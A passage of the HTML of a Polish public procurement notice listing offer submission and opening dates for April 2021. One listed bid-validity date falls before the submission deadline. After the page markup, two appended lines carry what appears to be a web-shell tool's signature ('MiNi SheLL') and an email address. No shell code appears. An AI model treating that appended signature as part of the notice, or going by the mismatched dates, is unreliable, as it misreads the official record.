umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy w sprawie zamówienia publicznego stanowiące załącznik nr 2 do SWZ – wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mss.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-04-20</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-13 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com